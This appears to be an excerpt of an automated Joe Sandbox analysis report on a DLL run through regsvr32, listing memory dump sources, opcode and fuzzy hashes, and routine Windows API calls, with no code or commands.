                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f1b44f26b2e4c7e97ddfb81a3adbda3d77288edc4ecbe0bae8cc8933f1c33e44
                                                                                                                            • Instruction ID: 08efbb833ea687ad733901112953304226336fcfa3581264405f9509991f6ff4
                                                                                                                            • Opcode Fuzzy Hash: f1b44f26b2e4c7e97ddfb81a3adbda3d77288edc4ecbe0bae8cc8933f1c33e44
                                                                                                                            • Instruction Fuzzy Hash: 6551BEB490074A8BCB48CF68D4875DE7FB0FB68398F20421DEC56AA250D3B496A5CFD4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 16eb5be53274359ca32061ddf2fd9752b6767c1a5dd3248deb14ec1aa5e29bf1
                                                                                                                            • Instruction ID: 52c1f8436ada09c5d91cc0f6a0e49c089501cc81ef075f7e28a52ff611ebfcf9
                                                                                                                            • Opcode Fuzzy Hash: 16eb5be53274359ca32061ddf2fd9752b6767c1a5dd3248deb14ec1aa5e29bf1
                                                                                                                            • Instruction Fuzzy Hash: D351B3B190438E8FCB48DF68D98A5DE7BB0FB48348F104A19FC26A6250D3B4D664CF85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: bcde6b28aa1f9cc532f581acc23668cd4c3c6920105dcd3780d199daaa58310a
                                                                                                                            • Instruction ID: 871f118089c9e262c63038bd4f0fd9666d89e9c6fa6f13266ea976bdce614408
                                                                                                                            • Opcode Fuzzy Hash: bcde6b28aa1f9cc532f581acc23668cd4c3c6920105dcd3780d199daaa58310a
                                                                                                                            • Instruction Fuzzy Hash: CB41393190071DABDB95CFA4C8892EEBBF1FF44358F608159E852A7384DBB49685CF81
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: be6c09d37bb88d9ef1cd1e4f7c6fe28a3503fab801bd979a9297db1a45dede51
                                                                                                                            • Instruction ID: 72cb41ac5f9990f9c197b8bd4b5430fc958a2c545255f7632808fe9bc15cd904
                                                                                                                            • Opcode Fuzzy Hash: be6c09d37bb88d9ef1cd1e4f7c6fe28a3503fab801bd979a9297db1a45dede51
                                                                                                                            • Instruction Fuzzy Hash: A141D27090034A8BCB48DF68D8865DE7FB0FB58388F20461DE81AA6350D3B896A5CBD5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 17a73d98c2b5216e6ebfe3da59b71ff0bc58f6e68d4a2580613c8fab7b77e503
                                                                                                                            • Instruction ID: 77361ced58272e7b73a95c704b243c92926a81ca7bf4620d616fd1e275fcbc28
                                                                                                                            • Opcode Fuzzy Hash: 17a73d98c2b5216e6ebfe3da59b71ff0bc58f6e68d4a2580613c8fab7b77e503
                                                                                                                            • Instruction Fuzzy Hash: A841D2B190434E8FCB48DF68C4865DE7FF0FB58388F204219E859A6250D3B896A5CFC5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _getptd
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3186804695-0
                                                                                                                            • Opcode ID: 07c06ba19e2310f742034fc51624b2b683580184b74621a532736302abba6d70
                                                                                                                            • Instruction ID: 520cc89a9d9bd6a3c8e88451fc2ab8fb104bda08d5325a853c8ba4946caf7d4e
                                                                                                                            • Opcode Fuzzy Hash: 07c06ba19e2310f742034fc51624b2b683580184b74621a532736302abba6d70
                                                                                                                            • Instruction Fuzzy Hash: 6431E622B1879981EB48DF26D5153AEAB91FB85BC0F084135EA8D0F79ADF3CD001CB11
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d3646060d8cb761d7de136982460322f3472e8f5a21e87ad1ead63779f29ae52
                                                                                                                            • Instruction ID: 4f2f4704f2b9e1c234c275d0f4f9a14eb4d491f2b4b6dbd4d57755e8fe2c6edd
                                                                                                                            • Opcode Fuzzy Hash: d3646060d8cb761d7de136982460322f3472e8f5a21e87ad1ead63779f29ae52
                                                                                                                            • Instruction Fuzzy Hash: 6341C4B090438ECFCF48CF68C8895CE7BB0FF58358F114A19E825A6250D3B49665CF95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 213fcaffb4d8b257d73b1e87ee3d57575e303918952cee2d1b890f97e83a5388
                                                                                                                            • Instruction ID: a8885bbbd8deb659e28c33910928e4ea9ad8e802d57f0785ac04cb05f9903a21
                                                                                                                            • Opcode Fuzzy Hash: 213fcaffb4d8b257d73b1e87ee3d57575e303918952cee2d1b890f97e83a5388
                                                                                                                            • Instruction Fuzzy Hash: 802160B0528784AFC398DF28D49981ABBF1FB89344F806A1DF98687350E374D459CB43
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 789a1fcad167e99ddc40482d8caf18e48711ae2075d057cfa5242344ff1b2506
                                                                                                                            • Instruction ID: 3e7ffcddda8d873ed620f17f9684606eb13d1dd5f0b21141b7977a2e64531d07
                                                                                                                            • Opcode Fuzzy Hash: 789a1fcad167e99ddc40482d8caf18e48711ae2075d057cfa5242344ff1b2506
                                                                                                                            • Instruction Fuzzy Hash: AF217F74529780AFC788DF29C08981EBBE1FB99748F806A1DF88697354D375D445CF42
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 825ba780bde58c245e7a1d3728ec0527652b1ee71a04877d42e2af350f08e315
                                                                                                                            • Instruction ID: 85e8bde3e512593198615bb83ad7c533a741442781c438c8658c5734f088230b
                                                                                                                            • Opcode Fuzzy Hash: 825ba780bde58c245e7a1d3728ec0527652b1ee71a04877d42e2af350f08e315
                                                                                                                            • Instruction Fuzzy Hash: AA2148B4508384CBD349DF29D05951BBBE0BB8D75CF900B1DF4CAAB264D7789644CB0A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d7cc4962d52e3e4a2947f3a3b752558ec936755315000d7411880e05df0ff2ae
                                                                                                                            • Instruction ID: 0e64719e5c120e76bd26ec58490d61b655644227c70bc7097eb0b273431ca18e
                                                                                                                            • Opcode Fuzzy Hash: d7cc4962d52e3e4a2947f3a3b752558ec936755315000d7411880e05df0ff2ae
                                                                                                                            • Instruction Fuzzy Hash: 83B09B2570C758854769470754145155556F79CBD460440349D4D57B54D93C96409B90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1012874770-0
                                                                                                                            • Opcode ID: b5d5b29a13da0feaba005b5cdbb38ef60d3e58c86b165e4530729409fd253580
                                                                                                                            • Instruction ID: d58c53c5c3843ca0bfdcfc90206a02470170446c42d2c4ab797c700552f43841
                                                                                                                            • Opcode Fuzzy Hash: b5d5b29a13da0feaba005b5cdbb38ef60d3e58c86b165e4530729409fd253580
                                                                                                                            • Instruction Fuzzy Hash: 2141A522A194B9C1EF68EF32D4512BC9760AF84B45F056031DB8D4F1A7CE15DC45D762
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC66D770D4,?,?,?,?,?,00007FFC66D77194), ref: 00007FFC66D7D0F5
                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC66D770D4,?,?,?,?,?,00007FFC66D77194), ref: 00007FFC66D7D111
                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC66D770D4,?,?,?,?,?,00007FFC66D77194), ref: 00007FFC66D7D139
                                                                                                                            • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC66D770D4,?,?,?,?,?,00007FFC66D77194), ref: 00007FFC66D7D142
                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC66D770D4,?,?,?,?,?,00007FFC66D77194), ref: 00007FFC66D7D158
                                                                                                                            • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC66D770D4,?,?,?,?,?,00007FFC66D77194), ref: 00007FFC66D7D161
                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC66D770D4,?,?,?,?,?,00007FFC66D77194), ref: 00007FFC66D7D177
                                                                                                                            • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC66D770D4,?,?,?,?,?,00007FFC66D77194), ref: 00007FFC66D7D180
                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC66D770D4,?,?,?,?,?,00007FFC66D77194), ref: 00007FFC66D7D19E
                                                                                                                            • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC66D770D4,?,?,?,?,?,00007FFC66D77194), ref: 00007FFC66D7D1A7
                                                                                                                            • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC66D770D4,?,?,?,?,?,00007FFC66D77194), ref: 00007FFC66D7D1D9
                                                                                                                            • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC66D770D4,?,?,?,?,?,00007FFC66D77194), ref: 00007FFC66D7D1E8
                                                                                                                            • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC66D770D4,?,?,?,?,?,00007FFC66D77194), ref: 00007FFC66D7D240
                                                                                                                            • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC66D770D4,?,?,?,?,?,00007FFC66D77194), ref: 00007FFC66D7D260
                                                                                                                            • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFC66D770D4,?,?,?,?,?,00007FFC66D77194), ref: 00007FFC66D7D279
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Pointer$AddressDecodeProc$Encode$LibraryLoad
                                                                                                                            • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                                                            • API String ID: 3085332118-232180764
                                                                                                                            • Opcode ID: 3571919baaed57aa13675d85a49604ff28a57139c9f79241176628fa60ae3818
                                                                                                                            • Instruction ID: d3adbfcb8af9b2bd0d89e361e4221b240e457476e7c05c56118e785c5fa75308
                                                                                                                            • Opcode Fuzzy Hash: 3571919baaed57aa13675d85a49604ff28a57139c9f79241176628fa60ae3818
                                                                                                                            • Instruction Fuzzy Hash: AF514E20A0EB6BD0FD6CDB52A858179A7906F85B90F440039DCCD0F7A1EE3CF446EA21
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CompareStringW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FFC66D807CE), ref: 00007FFC66D802F9
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FFC66D807CE), ref: 00007FFC66D8030D
                                                                                                                            • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FFC66D807CE), ref: 00007FFC66D80410
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CompareErrorInfoLastString
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3723911898-0
                                                                                                                            • Opcode ID: 1736e87f58a818c08770fb04f896c77e61df6c5aeab6e96dba7049e62cf85715
                                                                                                                            • Instruction ID: 7f87c927eecc5ab977819972ab3073556fe9934fcff0d6d223e4654e7445dd13
                                                                                                                            • Opcode Fuzzy Hash: 1736e87f58a818c08770fb04f896c77e61df6c5aeab6e96dba7049e62cf85715
                                                                                                                            • Instruction Fuzzy Hash: 1EE1B322A0E2EACBEB388F11944967D2791FB447D4F444539DA9D0F7C4CE3CA944EBA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Pointer$DecodeEncode$ConsoleCtrlErrorHandlerLast__doserrno_errno_lock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3466867069-0
                                                                                                                            • Opcode ID: 789b8b4bb0ab73352cc37038b561749136146399fcf5725f1f3e9913cb8e60dd
                                                                                                                            • Instruction ID: 9a97a3484932898779d5a4a5892e5f2777d1e3afd5d4ef4176717a86e97c0998
                                                                                                                            • Opcode Fuzzy Hash: 789b8b4bb0ab73352cc37038b561749136146399fcf5725f1f3e9913cb8e60dd
                                                                                                                            • Instruction Fuzzy Hash: AA71CE21E0E27FE0FA6D9709945A27C9A91EF91740F580939C5DE0E7E1DF2CF441EA22
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free$_lock$ErrorFreeHeapLast_errno
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1575098132-0
                                                                                                                            • Opcode ID: d886c0d7000bdee151ce2691e9d9b5ad3208a0c45e3f1c810682f6e78acd55a8
                                                                                                                            • Instruction ID: 8d5e6d0fe7b59b9a6544b0a7b006daa82ad1fd07a2ea92c73f8badb16301e159
                                                                                                                            • Opcode Fuzzy Hash: d886c0d7000bdee151ce2691e9d9b5ad3208a0c45e3f1c810682f6e78acd55a8
                                                                                                                            • Instruction Fuzzy Hash: 19311011A1E5AAC5FE6CEE729051778D690AF80B58F041135EACE4E686CF1CE840EB73
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free$ErrorInfoLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 189849726-0
                                                                                                                            • Opcode ID: 5e1deda3965494b22b6a4b1c1a8d863e304f3e95d2d689d04d0c4e6b189d07b4
                                                                                                                            • Instruction ID: 7a134e798b619173ecd1d7147ba9a6afc04bd1c0c7d9a553be5be558b1ec10d1
                                                                                                                            • Opcode Fuzzy Hash: 5e1deda3965494b22b6a4b1c1a8d863e304f3e95d2d689d04d0c4e6b189d07b4
                                                                                                                            • Instruction Fuzzy Hash: F5B1CF32A0C6A6C6DB28CF25A4442BDBBA0FB48744F59413AEB9C8B791DF3DD441DB11
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide$ErrorLastfree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 994105223-0
                                                                                                                            • Opcode ID: f850f7f34601db923eac004d86ac393417d210c29532925b20230ca42a5e0836
                                                                                                                            • Instruction ID: 4785086bd920e89fb9406fa09b750342ea20ebb9f62a6e9dcff84f2a692f8b11
                                                                                                                            • Opcode Fuzzy Hash: f850f7f34601db923eac004d86ac393417d210c29532925b20230ca42a5e0836
                                                                                                                            • Instruction Fuzzy Hash: EB417121A0D36AC1EB6C9B12A548039EBA5FB54FD0F550438DACE0BB54CE3DF851EB61
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1012874770-0
                                                                                                                            • Opcode ID: 3c3af7d426be30cf8e9a0f4f5ff6786eb9999c553a10af8131577c7025441718
                                                                                                                            • Instruction ID: 43d8414adce8650b4d590a951fe9b61442ad3e6d9273576d681b0f48c9157dba
                                                                                                                            • Opcode Fuzzy Hash: 3c3af7d426be30cf8e9a0f4f5ff6786eb9999c553a10af8131577c7025441718
                                                                                                                            • Instruction Fuzzy Hash: 80412332A0D5AAC4EF59DF22C4513BCA790AF84B55F041035DA8D4E695CF2DE881EB33
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free$_errno$DecodeEnvironmentPointerVariable__wtomb_environ
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3451773520-0
                                                                                                                            • Opcode ID: e694225545c17882180803efd4dd10bf6022db2104e00cc5aed2eaf73a595679
                                                                                                                            • Instruction ID: b3fb0b759cfe1f41832a45aff0b1b317540a03c1e844e4237ccb8e4eb3b07ef3
                                                                                                                            • Opcode Fuzzy Hash: e694225545c17882180803efd4dd10bf6022db2104e00cc5aed2eaf73a595679
                                                                                                                            • Instruction Fuzzy Hash: F3A1F925F0F66AC1FA28AB11A50827A6685FF407D8F048538C9DD4FBC5DE3CB445EBA0
